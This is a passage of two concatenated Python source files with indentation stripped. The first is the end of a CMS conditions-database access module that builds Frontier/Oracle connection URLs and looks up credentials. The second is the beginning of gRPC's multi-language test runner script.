ret = all([self.engine.dialect.has_table(engine_connection, table.__tablename__,getSchema(table)) for table in [_Tag, _IOV, _Payload]])
engine_connection.close()
return ret
def init(self, drop=False):
'''Initializes a database.
'''
logging.info('Initializing database...')
if drop:
logging.debug('Dropping tables...')
self.metadata.drop_all(self.engine)
self._is_valid = False
else:
if not self._is_valid:
logging.debug('Creating tables...')
self.get_dbtype(Tag).__table__.create(bind = self.engine)
self.get_dbtype(Payload).__table__.create(bind = self.engine)
self.get_dbtype(IOV).__table__.create(bind = self.engine)
self.get_dbtype(TagLog).__table__.create(bind = self.engine)
self.get_dbtype(GlobalTag).__table__.create(bind = self.engine)
self.get_dbtype(GlobalTagMap).__table__.create(bind = self.engine)
self._is_valid = True
def getSessionOnMasterDB( session1, session2 ):
key = '%s/%s'
sessiondict = { }
sessiondict[key %(session1._url.drivername,session1._url.host)] = session1
sessiondict[key %(session2._url.drivername,session2._url.host)] = session2
masterkey = key %('oracle',ONLINEORAPRO)
if masterkey in sessiondict.keys():
return sessiondict[masterkey]
adgkey = key %('oracle',ORAPRO)
if adgkey in sessiondict.keys():
return sessiondict[adgkey]
frontierkey = key %('frontier',PRO)
if frontierkey in sessiondict.keys():
return sessiondict[frontierkey]
# default case: frontier on pro
conn = Connection(make_url())
session = conn.session()
# is it required?
session._conn = conn
return session
# Connection helpers
def _getCMSFrontierConnectionString(database):
import subprocess
return subprocess.Popen(['cmsGetFnConnect', 'frontier://%s' % database], stdout = subprocess.PIPE).communicate()[0].strip()
def _getCMSSQLAlchemyConnectionString(technology,service,schema_name):
if technology == 'frontier':
import urllib
import sys
py3k = sys.version_info >= (3, 0)
if py3k:
return '%s://@%s/%s' % ('oracle+frontier', urllib.parse.quote_plus(_getCMSFrontierConnectionString(service)), schema_name )
else:
return '%s://@%s/%s' % ('oracle+frontier', urllib.quote_plus(_getCMSFrontierConnectionString(service)), schema_name )
elif technology == 'oracle':
return '%s://%s@%s' % (technology, schema_name, service)
# Entry point
def make_url(database='pro',read_only = True):
if database.startswith('sqlite:') or database.startswith('sqlite_file:'):
ignore, database = database.split(':',1)
if ':' in database and '://' not in database: # check if we really got a shortcut like "pro:<schema>" (and not a url like proto://...), if so, disentangle
database, schema = database.split(':')
officialdbs = {
# frontier
'pro' : ('frontier','PromptProd', { 'R': schema_name }, ),
'arc' : ('frontier','FrontierArc', { 'R': schema_name }, ),
'int' : ('frontier','FrontierInt', { 'R': schema_name }, ),
'dev' : ('frontier','FrontierPrep', { 'R': schema_name }, ),
# oracle adg
'orapro': ('oracle', 'cms_orcon_adg', { 'R': dbreader_user_name }, ),
'oraarc': ('oracle', 'cmsarc_lb', { 'R': dbreader_user_name }, ),
# oracle masters
'oraint': ('oracle', 'cms_orcoff_int', { 'R': dbreader_user_name,
'W': dbwriter_user_name }, ),
'oradev': ('oracle', 'cms_orcoff_prep', { 'R': dbreader_user_name,
'W': dbwriter_user_name }, ),
'onlineorapro': ('oracle', 'cms_orcon_prod', { 'R': dbreader_user_name,
'W': dbwriter_user_name }, ),
'onlineoraint': ('oracle', 'cmsintr_lb', { 'R': dbreader_user_name,
'W': dbwriter_user_name }, ),
}
if database in officialdbs.keys():
key = ('R' if read_only else 'W')
mapping = officialdbs[database]
tech = mapping[0]
service = mapping[1]
schema_dict = mapping[2]
if key in schema_dict.keys():
database = _getCMSSQLAlchemyConnectionString(tech,service,schema_dict[key])
else:
raise Exception("Read-only database %s://%s cannot be accessed in update mode." %(tech,service))
logging.debug('connection string set to "%s"' % database)
try:
url = sqlalchemy.engine.url.make_url(database)
except sqlalchemy.exc.ArgumentError:
url = sqlalchemy.engine.url.make_url('sqlite:///%s' % database)
return url
def connect(url, authPath=None, verbose=0):
'''Returns a Connection instance to the CMS Condition DB.
See database_help for the description of the database parameter.
The verbosity level is as follows:
0 = No output (default).
1 = SQL statements issued, including their parameters.
2 = In addition, results of the queries (all rows and the column headers).
'''
if url.drivername == 'oracle':
if url.username is None:
logging.error('Could not resolve the username for the connection %s. Please provide a connection in the format oracle://[user]:[pass]@[host]' %url )
raise Exception('Connection format error: %s' %url )
if url.password is None:
if authPath is None:
if authPathEnvVar in os.environ:
authPath = os.environ[authPathEnvVar]
explicit_auth = False
if authPath is not None:
dbkey_path = os.path.join(authPath,dbkey_folder)
if not os.path.exists(dbkey_path):
authFile = os.path.join(authPath,'.netrc')
if os.path.exists(authFile):
entryKey = url.host.lower()+"/"+url.username.lower()
logging.debug('Looking up credentials for %s in file %s ' %(entryKey,authFile) )
import netrc
params = netrc.netrc( authFile ).authenticators(entryKey)
if params is not None:
(username, account, password) = params
url.username = username
url.password = password
else:
msg = 'The entry %s has not been found in the .netrc file.' %entryKey
raise TypeError(msg)
else:
explicit_auth =True
else:
import pluginCondDBPyBind11Interface as credential_store
connect_for_update = ( url.username == dbwriter_user_name )
connection_string = oracle_connection_string(url.host.lower(),schema_name)
logging.debug('Using db key to get credentials for %s' %connection_string )
(username,password) = credential_store.get_db_credentials(connection_string,connect_for_update,authPath)
url.username = username
url.password = password
else:
import getpass
pwd = getpass.getpass('Password for %s: ' % str(url))
if pwd is None or pwd == '':
pwd = getpass.getpass('Password for %s: ' % str(url))
if pwd is None or pwd == '':
raise Exception('Empty password provided, bailing out...')
url.password = pwd
if verbose >= 1:
logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)
if verbose >= 2:
logging.getLogger('sqlalchemy.engine').setLevel(logging.DEBUG)
return Connection(url)
def _exists(session, primary_key, value):
ret = None
try:
ret = session.query(primary_key).\
filter(primary_key == value).\
count() != 0
except sqlalchemy.exc.OperationalError:
pass
return ret
def _inserted_before(timestamp):
'''To be used inside filter().
'''
if timestamp is None:
# XXX: Returning None does not get optimized (skipped) by SQLAlchemy,
# and returning True does not work in Oracle (generates "and 1"
# which breaks Oracle but not SQLite). For the moment just use
# this dummy condition.
return sqlalchemy.literal(True) == sqlalchemy.literal(True)
return conddb.IOV.insertion_time <= _parse_timestamp(timestamp)
def listObject(session, name, snapshot=None):
is_tag = _exists(session, Tag.name, name)
result = {}
if is_tag:
result['type'] = 'Tag'
result['name'] = session.query(Tag).get(name).name
result['timeType'] = session.query(Tag.time_type).\
filter(Tag.name == name).\
scalar()
result['iovs'] = session.query(IOV.since, IOV.insertion_time, IOV.payload_hash, Payload.object_type).\
join(IOV.payload).\
filter(
IOV.tag_name == name,
_inserted_before(snapshot),
).\
order_by(IOV.since.desc(), IOV.insertion_time.desc()).\
from_self().\
order_by(IOV.since, IOV.insertion_time).\
all()
try:
is_global_tag = _exists(session, GlobalTag.name, name)
if is_global_tag:
result['type'] = 'GlobalTag'
result['name'] = session.query(GlobalTag).get(name)
result['tags'] = session.query(GlobalTagMap.record, GlobalTagMap.label, GlobalTagMap.tag_name).\
filter(GlobalTagMap.global_tag_name == name).\
order_by(GlobalTagMap.record, GlobalTagMap.label).\
all()
except sqlalchemy.exc.OperationalError:
sys.stderr.write("No table for GlobalTags found in DB.\n\n")
if not is_tag and not is_global_tag:
raise Exception('There is no tag or global tag named %s in the database.' % name)
return result
def getPayload(session, hash):
# get payload from DB:
data, payloadType = session.query(Payload.data, Payload.object_type).filter(Payload.hash == hash).one()
return data
|
the-stack_106_14813
|
#!/usr/bin/env python
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run tests in parallel."""
from __future__ import print_function
import argparse
import ast
import collections
import glob
import itertools
import json
import logging
import multiprocessing
import os
import os.path
import pipes
import platform
import random
import re
import socket
import subprocess
import sys
import tempfile
import traceback
import time
from six.moves import urllib
import uuid
import six
import python_utils.jobset as jobset
import python_utils.report_utils as report_utils
import python_utils.watch_dirs as watch_dirs
import python_utils.start_port_server as start_port_server
try:
from python_utils.upload_test_results import upload_results_to_bq
except (ImportError):
pass # It's ok to not import because this is only necessary to upload results to BQ.
gcp_utils_dir = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../gcp/utils'))
sys.path.append(gcp_utils_dir)
_ROOT = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
os.chdir(_ROOT)
_FORCE_ENVIRON_FOR_WRAPPERS = {
'GRPC_VERBOSITY': 'DEBUG',
}
_POLLING_STRATEGIES = {
'linux': ['epollex', 'epoll1', 'poll'],
'mac': ['poll'],
}
def platform_string():
return jobset.platform_string()
_DEFAULT_TIMEOUT_SECONDS = 5 * 60
_PRE_BUILD_STEP_TIMEOUT_SECONDS = 10 * 60
def run_shell_command(cmd, env=None, cwd=None):
try:
subprocess.check_output(cmd, shell=True, env=env, cwd=cwd)
except subprocess.CalledProcessError as e:
logging.exception(
"Error while running command '%s'. Exit status %d. Output:\n%s",
e.cmd, e.returncode, e.output)
raise
def max_parallel_tests_for_current_platform():
# Too much test parallelization has only been seen to be a problem
# so far on windows.
if jobset.platform_string() == 'windows':
return 64
return 1024
# SimpleConfig: just compile with CONFIG=config, and run the binary to test
class Config(object):
def __init__(self,
config,
environ=None,
timeout_multiplier=1,
tool_prefix=[],
iomgr_platform='native'):
if environ is None:
environ = {}
self.build_config = config
self.environ = environ
self.environ['CONFIG'] = config
self.tool_prefix = tool_prefix
self.timeout_multiplier = timeout_multiplier
self.iomgr_platform = iomgr_platform
def job_spec(self,
cmdline,
timeout_seconds=_DEFAULT_TIMEOUT_SECONDS,
shortname=None,
environ={},
cpu_cost=1.0,
flaky=False):
"""Construct a jobset.JobSpec for a test under this config
Args:
cmdline: a list of strings specifying the command line the test
would like to run
"""
actual_environ = self.environ.copy()
for k, v in environ.items():
actual_environ[k] = v
if not flaky and shortname and shortname in flaky_tests:
flaky = True
if shortname in shortname_to_cpu:
cpu_cost = shortname_to_cpu[shortname]
return jobset.JobSpec(
cmdline=self.tool_prefix + cmdline,
shortname=shortname,
environ=actual_environ,
cpu_cost=cpu_cost,
timeout_seconds=(self.timeout_multiplier *
timeout_seconds if timeout_seconds else None),
flake_retries=4 if flaky or args.allow_flakes else 0,
timeout_retries=1 if flaky or args.allow_flakes else 0)
def get_c_tests(travis, test_lang):
out = []
platforms_str = 'ci_platforms' if travis else 'platforms'
with open('tools/run_tests/generated/tests.json') as f:
js = json.load(f)
return [
tgt for tgt in js
if tgt['language'] == test_lang and platform_string() in
tgt[platforms_str] and not (travis and tgt['flaky'])
]
def _check_compiler(compiler, supported_compilers):
if compiler not in supported_compilers:
raise Exception('Compiler %s not supported (on this platform).' %
compiler)
def _check_arch(arch, supported_archs):
if arch not in supported_archs:
raise Exception('Architecture %s not supported.' % arch)
def _is_use_docker_child():
"""Returns True if running running as a --use_docker child."""
return True if os.getenv('RUN_TESTS_COMMAND') else False
_PythonConfigVars = collections.namedtuple('_ConfigVars', [
'shell',
'builder',
'builder_prefix_arguments',
'venv_relative_python',
'toolchain',
'runner',
'test_name',
'iomgr_platform',
])
def _python_config_generator(name, major, minor, bits, config_vars):
name += '_' + config_vars.iomgr_platform
return PythonConfig(
name, config_vars.shell + config_vars.builder +
config_vars.builder_prefix_arguments +
[_python_pattern_function(major=major, minor=minor, bits=bits)] +
[name] + config_vars.venv_relative_python + config_vars.toolchain,
config_vars.shell + config_vars.runner + [
os.path.join(name, config_vars.venv_relative_python[0]),
config_vars.test_name
])
def _pypy_config_generator(name, major, config_vars):
return PythonConfig(
name, config_vars.shell + config_vars.builder +
config_vars.builder_prefix_arguments +
[_pypy_pattern_function(major=major)] + [name] +
config_vars.venv_relative_python + config_vars.toolchain,
config_vars.shell + config_vars.runner +
[os.path.join(name, config_vars.venv_relative_python[0])])
def _python_pattern_function(major, minor, bits):
# Bit-ness is handled by the test machine's environment
if os.name == "nt":
if bits == "64":
return '/c/Python{major}{minor}/python.exe'.format(major=major,
minor=minor,
bits=bits)
else:
return '/c/Python{major}{minor}_{bits}bits/python.exe'.format(
major=major, minor=minor, bits=bits)
else:
return 'python{major}.{minor}'.format(major=major, minor=minor)
def _pypy_pattern_function(major):
if major == '2':
return 'pypy'
elif major == '3':
return 'pypy3'
else:
raise ValueError("Unknown PyPy major version")
class CLanguage(object):
def __init__(self, make_target, test_lang):
self.make_target = make_target
self.platform = platform_string()
self.test_lang = test_lang
def configure(self, config, args):
self.config = config
self.args = args
self._make_options = []
self._use_cmake = True
if self.platform == 'windows':
_check_compiler(self.args.compiler, [
'default', 'cmake', 'cmake_vs2015', 'cmake_vs2017',
'cmake_vs2019'
])
_check_arch(self.args.arch, ['default', 'x64', 'x86'])
if self.args.compiler == 'cmake_vs2019':
cmake_generator_option = 'Visual Studio 16 2019'
elif self.args.compiler == 'cmake_vs2017':
cmake_generator_option = 'Visual Studio 15 2017'
else:
cmake_generator_option = 'Visual Studio 14 2015'
cmake_arch_option = 'x64' if self.args.arch == 'x64' else 'Win32'
self._cmake_configure_extra_args = [
'-G', cmake_generator_option, '-A', cmake_arch_option
]
else:
if self.platform == 'linux':
# Allow all the known architectures. _check_arch_option has already checked that we're not doing
# something illegal when not running under docker.
_check_arch(self.args.arch, ['default', 'x64', 'x86'])
else:
_check_arch(self.args.arch, ['default'])
self._docker_distro, self._cmake_configure_extra_args = self._compiler_options(
self.args.use_docker, self.args.compiler)
if self.args.arch == 'x86':
# disable boringssl asm optimizations when on x86
# see https://github.com/grpc/grpc/blob/b5b8578b3f8b4a9ce61ed6677e19d546e43c5c68/tools/run_tests/artifacts/artifact_targets.py#L253
self._cmake_configure_extra_args.append('-DOPENSSL_NO_ASM=ON')
if args.iomgr_platform == "uv":
cflags = '-DGRPC_UV -DGRPC_CUSTOM_IOMGR_THREAD_CHECK -DGRPC_CUSTOM_SOCKET '
try:
cflags += subprocess.check_output(
['pkg-config', '--cflags', 'libuv']).strip() + ' '
except (subprocess.CalledProcessError, OSError):
pass
try:
ldflags = subprocess.check_output(
['pkg-config', '--libs', 'libuv']).strip() + ' '
except (subprocess.CalledProcessError, OSError):
ldflags = '-luv '
self._make_options += [
'EXTRA_CPPFLAGS={}'.format(cflags),
'EXTRA_LDLIBS={}'.format(ldflags)
]
def test_specs(self):
out = []
binaries = get_c_tests(self.args.travis, self.test_lang)
for target in binaries:
if self._use_cmake and target.get('boringssl', False):
# cmake doesn't build boringssl tests
continue
auto_timeout_scaling = target.get('auto_timeout_scaling', True)
polling_strategies = (_POLLING_STRATEGIES.get(
self.platform, ['all']) if target.get('uses_polling', True) else
['none'])
if self.args.iomgr_platform == 'uv':
polling_strategies = ['all']
for polling_strategy in polling_strategies:
env = {
'GRPC_DEFAULT_SSL_ROOTS_FILE_PATH':
_ROOT + '/src/core/tsi/test_creds/ca.pem',
'GRPC_POLL_STRATEGY':
polling_strategy,
'GRPC_VERBOSITY':
'DEBUG'
}
resolver = os.environ.get('GRPC_DNS_RESOLVER', None)
if resolver:
env['GRPC_DNS_RESOLVER'] = resolver
shortname_ext = '' if polling_strategy == 'all' else ' GRPC_POLL_STRATEGY=%s' % polling_strategy
if polling_strategy in target.get('excluded_poll_engines', []):
continue
timeout_scaling = 1
if auto_timeout_scaling:
config = self.args.config
if ('asan' in config or config == 'msan' or
config == 'tsan' or config == 'ubsan' or
config == 'helgrind' or config == 'memcheck'):
# Scale overall test timeout if running under various sanitizers.
# scaling value is based on historical data analysis
timeout_scaling *= 3
if self.config.build_config in target['exclude_configs']:
continue
if self.args.iomgr_platform in target.get('exclude_iomgrs', []):
continue
if self.platform == 'windows':
binary = 'cmake/build/%s/%s.exe' % (_MSBUILD_CONFIG[
self.config.build_config], target['name'])
else:
if self._use_cmake:
binary = 'cmake/build/%s' % target['name']
else:
binary = 'bins/%s/%s' % (self.config.build_config,
target['name'])
cpu_cost = target['cpu_cost']
if cpu_cost == 'capacity':
cpu_cost = multiprocessing.cpu_count()
if os.path.isfile(binary):
list_test_command = None
filter_test_command = None
# these are the flag defined by gtest and benchmark framework to list
# and filter test runs. We use them to split each individual test
# into its own JobSpec, and thus into its own process.
if 'benchmark' in target and target['benchmark']:
with open(os.devnull, 'w') as fnull:
tests = subprocess.check_output(
[binary, '--benchmark_list_tests'],
stderr=fnull)
for line in tests.split('\n'):
test = line.strip()
if not test: continue
cmdline = [binary,
'--benchmark_filter=%s$' % test
] + target['args']
out.append(
self.config.job_spec(
cmdline,
shortname='%s %s' %
(' '.join(cmdline), shortname_ext),
cpu_cost=cpu_cost,
timeout_seconds=target.get(
'timeout_seconds',
_DEFAULT_TIMEOUT_SECONDS) *
timeout_scaling,
environ=env))
elif 'gtest' in target and target['gtest']:
# here we parse the output of --gtest_list_tests to build up a complete
# list of the tests contained in a binary for each test, we then
# add a job to run, filtering for just that test.
with open(os.devnull, 'w') as fnull:
tests = subprocess.check_output(
[binary, '--gtest_list_tests'], stderr=fnull)
base = None
for line in tests.split('\n'):
i = line.find('#')
if i >= 0: line = line[:i]
if not line: continue
if line[0] != ' ':
base = line.strip()
else:
assert base is not None
assert line[1] == ' '
test = base + line.strip()
cmdline = [binary,
'--gtest_filter=%s' % test
] + target['args']
out.append(
self.config.job_spec(
cmdline,
shortname='%s %s' %
(' '.join(cmdline), shortname_ext),
cpu_cost=cpu_cost,
timeout_seconds=target.get(
'timeout_seconds',
_DEFAULT_TIMEOUT_SECONDS) *
timeout_scaling,
environ=env))
else:
cmdline = [binary] + target['args']
shortname = target.get(
'shortname',
' '.join(pipes.quote(arg) for arg in cmdline))
shortname += shortname_ext
out.append(
self.config.job_spec(
cmdline,
shortname=shortname,
cpu_cost=cpu_cost,
flaky=target.get('flaky', False),
timeout_seconds=target.get(
'timeout_seconds',
_DEFAULT_TIMEOUT_SECONDS) * timeout_scaling,
environ=env))
elif self.args.regex == '.*' or self.platform == 'windows':
print('\nWARNING: binary not found, skipping', binary)
return sorted(out)
def make_targets(self):
if self.platform == 'windows':
# don't build tools on windows just yet
return ['buildtests_%s' % self.make_target]
return [
'buildtests_%s' % self.make_target,
'tools_%s' % self.make_target, 'check_epollexclusive'
]
def make_options(self):
return self._make_options
def pre_build_steps(self):
if self.platform == 'windows':
return [['tools\\run_tests\\helper_scripts\\pre_build_cmake.bat'] +
self._cmake_configure_extra_args]
elif self._use_cmake:
return [['tools/run_tests/helper_scripts/pre_build_cmake.sh'] +
self._cmake_configure_extra_args]
else:
return []
def build_steps(self):
return []
def post_tests_steps(self):
if self.platform == 'windows':
return []
else:
return [['tools/run_tests/helper_scripts/post_tests_c.sh']]
def makefile_name(self):
if self._use_cmake:
return 'cmake/build/Makefile'
else:
return 'Makefile'
def _clang_cmake_configure_extra_args(self, version_suffix=''):
return [
'-DCMAKE_C_COMPILER=clang%s' % version_suffix,
'-DCMAKE_CXX_COMPILER=clang++%s' % version_suffix,
]
def _compiler_options(self, use_docker, compiler):
"""Returns docker distro and cmake configure args to use for given compiler."""
if not use_docker and not _is_use_docker_child():
# if not running under docker, we cannot ensure the right compiler version will be used,
# so we only allow the non-specific choices.
_check_compiler(compiler, ['default', 'cmake'])
if compiler == 'gcc4.9' or compiler == 'default' or compiler == 'cmake':
return ('jessie', [])
elif compiler == 'gcc5.3':
return ('ubuntu1604', [])
elif compiler == 'gcc7.4':
return ('ubuntu1804', [])
elif compiler == 'gcc8.3':
return ('buster', [])
elif compiler == 'gcc_musl':
return ('alpine', [])
elif compiler == 'clang3.6':
return ('ubuntu1604',
self._clang_cmake_configure_extra_args(
version_suffix='-3.6'))
elif compiler == 'clang3.7':
return ('ubuntu1604',
self._clang_cmake_configure_extra_args(
version_suffix='-3.7'))
else:
raise Exception('Compiler %s not supported.' % compiler)
def dockerfile_dir(self):
return 'tools/dockerfile/test/cxx_%s_%s' % (
self._docker_distro, _docker_arch_suffix(self.args.arch))
def __str__(self):
return self.make_target
# This tests Node on grpc/grpc-node and will become the standard for Node testing
class RemoteNodeLanguage(object):
def __init__(self):
self.platform = platform_string()
def configure(self, config, args):
self.config = config
self.args = args
# Note: electron ABI only depends on major and minor version, so that's all
# we should specify in the compiler argument
_check_compiler(self.args.compiler, [
'default', 'node0.12', 'node4', 'node5', 'node6', 'node7', 'node8',
'electron1.3', 'electron1.6'
])
if self.args.compiler == 'default':
self.runtime = 'node'
self.node_version = '8'
else:
if self.args.compiler.startswith('electron'):
self.runtime = 'electron'
self.node_version = self.args.compiler[8:]
else:
self.runtime = 'node'
# Take off the word "node"
self.node_version = self.args.compiler[4:]
# TODO: update with Windows/electron scripts when available for grpc/grpc-node
def test_specs(self):
if self.platform == 'windows':
return [
self.config.job_spec(
['tools\\run_tests\\helper_scripts\\run_node.bat'])
]
else:
return [
self.config.job_spec(
['tools/run_tests/helper_scripts/run_grpc-node.sh'],
None,
environ=_FORCE_ENVIRON_FOR_WRAPPERS)
]
def pre_build_steps(self):
return []
def make_targets(self):
return []
def make_options(self):
return []
def build_steps(self):
return []
def post_tests_steps(self):
return []
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/node_jessie_%s' % _docker_arch_suffix(
self.args.arch)
def __str__(self):
return 'grpc-node'
class PhpLanguage(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
self._make_options = ['EMBED_OPENSSL=true', 'EMBED_ZLIB=true']
def test_specs(self):
return [
self.config.job_spec(['src/php/bin/run_tests.sh'],
environ=_FORCE_ENVIRON_FOR_WRAPPERS)
]
def pre_build_steps(self):
return []
def make_targets(self):
return ['static_c', 'shared_c']
def make_options(self):
return self._make_options
def build_steps(self):
return [['tools/run_tests/helper_scripts/build_php.sh']]
def post_tests_steps(self):
return [['tools/run_tests/helper_scripts/post_tests_php.sh']]
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/php_jessie_%s' % _docker_arch_suffix(
self.args.arch)
def __str__(self):
return 'php'
class Php7Language(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
self._make_options = ['EMBED_OPENSSL=true', 'EMBED_ZLIB=true']
def test_specs(self):
return [
self.config.job_spec(['src/php/bin/run_tests.sh'],
environ=_FORCE_ENVIRON_FOR_WRAPPERS)
]
def pre_build_steps(self):
return []
def make_targets(self):
return ['static_c', 'shared_c']
def make_options(self):
return self._make_options
def build_steps(self):
return [['tools/run_tests/helper_scripts/build_php.sh']]
def post_tests_steps(self):
return [['tools/run_tests/helper_scripts/post_tests_php.sh']]
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/php7_jessie_%s' % _docker_arch_suffix(
self.args.arch)
def __str__(self):
return 'php7'
class PythonConfig(
collections.namedtuple('PythonConfig', ['name', 'build', 'run'])):
"""Tuple of commands (named s.t. 'what it says on the tin' applies)"""
class PythonLanguage(object):
_TEST_SPECS_FILE = {
'native': 'src/python/grpcio_tests/tests/tests.json',
'gevent': 'src/python/grpcio_tests/tests/tests.json',
'asyncio': 'src/python/grpcio_tests/tests_aio/tests.json',
}
_TEST_FOLDER = {
'native': 'test',
'gevent': 'test',
'asyncio': 'test_aio',
}
def configure(self, config, args):
self.config = config
self.args = args
self.pythons = self._get_pythons(self.args)
def test_specs(self):
# load list of known test suites
with open(self._TEST_SPECS_FILE[
self.args.iomgr_platform]) as tests_json_file:
tests_json = json.load(tests_json_file)
environment = dict(_FORCE_ENVIRON_FOR_WRAPPERS)
# TODO(https://github.com/grpc/grpc/issues/21401) Fork handlers is not
# designed for non-native IO manager. It has a side-effect that
# overrides threading settings in C-Core.
if args.iomgr_platform != 'native':
environment['GRPC_ENABLE_FORK_SUPPORT'] = '0'
return [
self.config.job_spec(
config.run,
timeout_seconds=5 * 60,
environ=dict(GRPC_PYTHON_TESTRUNNER_FILTER=str(suite_name),
**environment),
shortname='%s.%s.%s' %
(config.name, self._TEST_FOLDER[self.args.iomgr_platform],
suite_name),
) for suite_name in tests_json for config in self.pythons
]
def pre_build_steps(self):
return []
def make_targets(self):
return []
def make_options(self):
return []
def build_steps(self):
return [config.build for config in self.pythons]
def post_tests_steps(self):
if self.config.build_config != 'gcov':
return []
else:
return [['tools/run_tests/helper_scripts/post_tests_python.sh']]
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/python_%s_%s' % (
self._python_manager_name(), _docker_arch_suffix(self.args.arch))
def _python_manager_name(self):
"""Choose the docker image to use based on python version."""
if self.args.compiler in [
'python2.7', 'python3.5', 'python3.6', 'python3.7', 'python3.8'
]:
return 'stretch_' + self.args.compiler[len('python'):]
elif self.args.compiler == 'python_alpine':
return 'alpine'
else:
return 'stretch_default'
def _get_pythons(self, args):
"""Get python runtimes to test with, based on current platform, architecture, compiler etc."""
if args.arch == 'x86':
bits = '32'
else:
bits = '64'
if os.name == 'nt':
shell = ['bash']
builder = [
os.path.abspath(
'tools/run_tests/helper_scripts/build_python_msys2.sh')
]
builder_prefix_arguments = ['MINGW{}'.format(bits)]
venv_relative_python = ['Scripts/python.exe']
toolchain = ['mingw32']
else:
shell = []
builder = [
os.path.abspath(
'tools/run_tests/helper_scripts/build_python.sh')
]
builder_prefix_arguments = []
venv_relative_python = ['bin/python']
toolchain = ['unix']
# Selects the corresponding testing mode.
# See src/python/grpcio_tests/commands.py for implementation details.
if args.iomgr_platform == 'native':
test_command = 'test_lite'
elif args.iomgr_platform == 'gevent':
test_command = 'test_gevent'
elif args.iomgr_platform == 'asyncio':
test_command = 'test_aio'
else:
raise ValueError('Unsupported IO Manager platform: %s' %
args.iomgr_platform)
runner = [
os.path.abspath('tools/run_tests/helper_scripts/run_python.sh')
]
config_vars = _PythonConfigVars(shell, builder,
builder_prefix_arguments,
venv_relative_python, toolchain, runner,
test_command, args.iomgr_platform)
python27_config = _python_config_generator(name='py27',
major='2',
minor='7',
bits=bits,
config_vars=config_vars)
python35_config = _python_config_generator(name='py35',
major='3',
minor='5',
bits=bits,
config_vars=config_vars)
python36_config = _python_config_generator(name='py36',
major='3',
minor='6',
bits=bits,
config_vars=config_vars)
python37_config = _python_config_generator(name='py37',
major='3',
minor='7',
bits=bits,
config_vars=config_vars)
python38_config = _python_config_generator(name='py38',
major='3',
minor='8',
bits=bits,
config_vars=config_vars)
pypy27_config = _pypy_config_generator(name='pypy',
major='2',
config_vars=config_vars)
pypy32_config = _pypy_config_generator(name='pypy3',
major='3',
config_vars=config_vars)
if args.iomgr_platform == 'asyncio':
if args.compiler not in ('default', 'python3.6', 'python3.7',
'python3.8'):
raise Exception(
'Compiler %s not supported with IO Manager platform: %s' %
(args.compiler, args.iomgr_platform))
if args.compiler == 'default':
if os.name == 'nt':
if args.iomgr_platform == 'gevent':
# TODO(https://github.com/grpc/grpc/issues/23784) allow
# gevent to run on later version once issue solved.
return (python36_config,)
else:
return (python38_config,)
else:
if args.iomgr_platform == 'asyncio':
return (python36_config, python38_config)
elif os.uname()[0] == 'Darwin':
# NOTE(rbellevi): Testing takes significantly longer on
# MacOS, so we restrict the number of interpreter versions
# tested.
return (
python27_config,
python38_config,
)
else:
return (
python27_config,
python35_config,
python37_config,
python38_config,
)
elif args.compiler == 'python2.7':
return (python27_config,)
elif args.compiler == 'python3.5':
return (python35_config,)
elif args.compiler == 'python3.6':
return (python36_config,)
elif args.compiler == 'python3.7':
return (python37_config,)
elif args.compiler == 'python3.8':
return (python38_config,)
elif args.compiler == 'pypy':
return (pypy27_config,)
elif args.compiler == 'pypy3':
return (pypy32_config,)
elif args.compiler == 'python_alpine':
return (python27_config,)
elif args.compiler == 'all_the_cpythons':
return (
python27_config,
python35_config,
python36_config,
python37_config,
python38_config,
)
else:
raise Exception('Compiler %s not supported.' % args.compiler)
def __str__(self):
return 'python'
class RubyLanguage(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
def test_specs(self):
tests = [
self.config.job_spec(['tools/run_tests/helper_scripts/run_ruby.sh'],
timeout_seconds=10 * 60,
environ=_FORCE_ENVIRON_FOR_WRAPPERS)
]
for test in [
'src/ruby/end2end/sig_handling_test.rb',
'src/ruby/end2end/channel_state_test.rb',
'src/ruby/end2end/channel_closing_test.rb',
'src/ruby/end2end/sig_int_during_channel_watch_test.rb',
'src/ruby/end2end/killed_client_thread_test.rb',
'src/ruby/end2end/forking_client_test.rb',
'src/ruby/end2end/grpc_class_init_test.rb',
'src/ruby/end2end/multiple_killed_watching_threads_test.rb',
'src/ruby/end2end/load_grpc_with_gc_stress_test.rb',
'src/ruby/end2end/client_memory_usage_test.rb',
'src/ruby/end2end/package_with_underscore_test.rb',
'src/ruby/end2end/graceful_sig_handling_test.rb',
'src/ruby/end2end/graceful_sig_stop_test.rb',
'src/ruby/end2end/errors_load_before_grpc_lib_test.rb',
'src/ruby/end2end/logger_load_before_grpc_lib_test.rb',
'src/ruby/end2end/status_codes_load_before_grpc_lib_test.rb',
'src/ruby/end2end/call_credentials_timeout_test.rb',
'src/ruby/end2end/call_credentials_returning_bad_metadata_doesnt_kill_background_thread_test.rb'
]:
tests.append(
self.config.job_spec(['ruby', test],
shortname=test,
timeout_seconds=20 * 60,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
return tests
def pre_build_steps(self):
return [['tools/run_tests/helper_scripts/pre_build_ruby.sh']]
def make_targets(self):
return []
def make_options(self):
return []
def build_steps(self):
return [['tools/run_tests/helper_scripts/build_ruby.sh']]
def post_tests_steps(self):
return [['tools/run_tests/helper_scripts/post_tests_ruby.sh']]
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/ruby_jessie_%s' % _docker_arch_suffix(
self.args.arch)
def __str__(self):
return 'ruby'
